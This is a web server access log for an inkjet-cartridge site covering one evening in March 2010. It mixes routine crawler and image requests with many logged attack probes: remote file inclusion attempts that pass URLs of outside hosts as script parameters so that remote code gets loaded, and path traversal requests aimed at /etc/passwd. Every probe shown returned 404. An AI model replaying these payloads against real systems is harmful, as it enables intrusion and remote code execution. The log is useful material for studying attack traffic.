85.233.162.101 - - [01/Mar/2010:18:49:45 -0800] "GET /logs/access.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:49:49 -0800] "GET /phpbb/viewtopic.php?p=65 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:18:51:22 -0800] "GET /logs//index.php?nav=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:18:51:22 -0800] "GET /index.php?nav=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:18:51:22 -0800] "GET /logs//index.php?nav=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:18:51:22 -0800] "GET /index.php?nav=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:51:38 -0800] "GET /logs/?S=D HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.195.226 - - [01/Mar/2010:18:53:42 -0800] "GET /dsm/ HTTP/1.1" 200 1437 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:56:51 -0800] "GET /phpbb/viewtopic.php?t=1097&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:57:01 -0800] "GET /phpbb/viewtopic.php?p=86 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:01:30 -0800] "GET /phpbb/viewtopic.php?p=2558 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:05:11 -0800] "GET /phpbb/viewtopic.php?p=1994 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
199.120.90.223 - - [01/Mar/2010:19:05:34 -0800] "GET /logs//nullpo/index.php?subdir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
199.120.90.223 - - [01/Mar/2010:19:05:34 -0800] "GET /nullpo/index.php?subdir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:12:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:12:18 -0800] "GET /phpbb/viewtopic.php?p=771 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:12:23 -0800] "GET /phpbb/viewtopic.php?t=1241&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_01.gif HTTP/1.1" 200 7425 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_02.gif HTTP/1.1" 200 15059 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_03.gif HTTP/1.1" 200 14569 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_05.gif HTTP/1.1" 200 16767 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.248.176.48 - - [01/Mar/2010:19:19:41 -0800] "GET /email/images/inkmail8_06.gif HTTP/1.1" 200 26649 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:21:42 -0800] "GET /phpbb/viewtopic.php?p=4811 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:36:00 -0800] "GET /phpbb/viewtopic.php?p=2820 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.118.102.193 - - [01/Mar/2010:19:39:55 -0800] "GET /phpbb/index.php HTTP/1.0" 200 517 "http://site.inkjetcartridge.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:40:37 -0800] "GET /phpbb/viewtopic.php?t=329 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:48:54 -0800] "GET /phpbb/viewtopic.php?t=606 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:19:51:56 -0800] "GET /phpbb/viewtopic.php?p=1948 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:19:55:19 -0800] "GET /logs/access_091201.log/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:19:55:19 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:19:55:19 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [01/Mar/2010:19:56:27 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [01/Mar/2010:19:56:27 -0800] "GET /logs/access_100101.log%20%20//appserv/main.php?appserv_root=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [01/Mar/2010:19:56:27 -0800] "GET /appserv/main.php?appserv_root=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
41.204.218.244 - - [01/Mar/2010:19:58:12 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:00:10 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=46 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:08:03 -0800] "GET /phpbb/viewtopic.php?t=566 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:20:19:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:20:21:25 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:20:21:25 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:20:21:25 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:24:27 -0800] "GET /tmp/?N=A HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:20:25:31 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:20:25:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:20:25:31 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:27:30 -0800] "GET /logs/?M=D HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:30:12 -0800] "GET /logs/access.log%20%20/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:30:12 -0800] "GET /admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:30:12 -0800] "GET /logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:32:18 -0800] "GET /phpbb/viewtopic.php?p=1937 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:39:43 -0800] "GET /logs/access_100101.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:41:13 -0800] "GET /logs/access_091201.log%20%20/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:41:13 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:41:13 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:41:20 -0800] "GET /logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:42:30 -0800] "GET /logs/access_091201.log%20%20/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:42:30 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.95.229.230 - - [01/Mar/2010:20:42:30 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:43:31 -0800] "GET /phpbb/viewtopic.php?p=191 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:20:44:20 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:20:44:20 -0800] "GET /logs/access_091201.log/index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.39.140.100 - - [01/Mar/2010:20:44:20 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:45:46 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:45:46 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:46:09 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:46:09 -0800] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:46:09 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:20:48:36 -0800] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
88.191.94.188 - - [01/Mar/2010:20:49:13 -0800] "GET /logs/scripts.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:50:30 -0800] "GET /phpbb/viewtopic.php?t=16&start=585 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:53:06 -0800] "GET /phpbb/viewtopic.php?t=876 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:53:47 -0800] "GET /phpbb/viewtopic.php?p=962 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
174.129.80.172 - - [01/Mar/2010:20:54:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
174.129.80.172 - - [01/Mar/2010:20:54:46 -0800] "GET /phpbb//posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:20:55:44 -0800] "GET /phpbb/viewtopic.php?t=1482&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/lostminerranch.gif HTTP/1.1" 200 9260 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/roi.gif HTTP/1.1" 200 8343 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/amd.gif HTTP/1.1" 200 10242 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/mini2.gif HTTP/1.1" 200 7156 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/alaska.gif HTTP/1.1" 200 8147 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/magma.gif HTTP/1.1" 200 8881 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/profly.gif HTTP/1.1" 200 10139 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:12 -0800] "GET /boomerang_images/funfly.gif HTTP/1.1" 200 23033 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
173.71.212.110 - - [01/Mar/2010:20:56:13 -0800] "GET /boomerang_images/tri-fly.jpg HTTP/1.1" 200 7476 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:00:30 -0800] "GET /phpbb/viewtopic.php?p=3376 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:01:34 -0800] "GET /phpbb/viewtopic.php?t=833 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:18:00 -0800] "GET /phpbb/viewtopic.php?t=591 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:18:43 -0800] "GET /phpbb/viewtopic.php?p=2828 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:28:07 -0800] "GET /phpbb/viewtopic.php?p=3084 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:37:02 -0800] "GET /phpbb/viewtopic.php?t=84 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:19 -0800] "GET /include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:19 -0800] "GET /logs/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:20 -0800] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:33 -0800] "GET /include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:33 -0800] "GET /logs/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:37:33 -0800] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:38:33 -0800] "GET /phpbb/viewtopic.php?p=2258 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:40:47 -0800] "GET /phpbb/viewtopic.php?t=140 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:21:41:29 -0800] "GET /phpbb/viewtopic.php?p=572 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:43:37 -0800] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:21:47:14 -0800] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
71.93.253.54 - - [01/Mar/2010:21:49:25 -0800] "GET /email/images/inkmail20_06.gif HTTP/1.1" 200 17301 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.93.253.54 - - [01/Mar/2010:21:49:25 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:54:14 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:21:54:14 -0800] "GET /logs/access_100101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
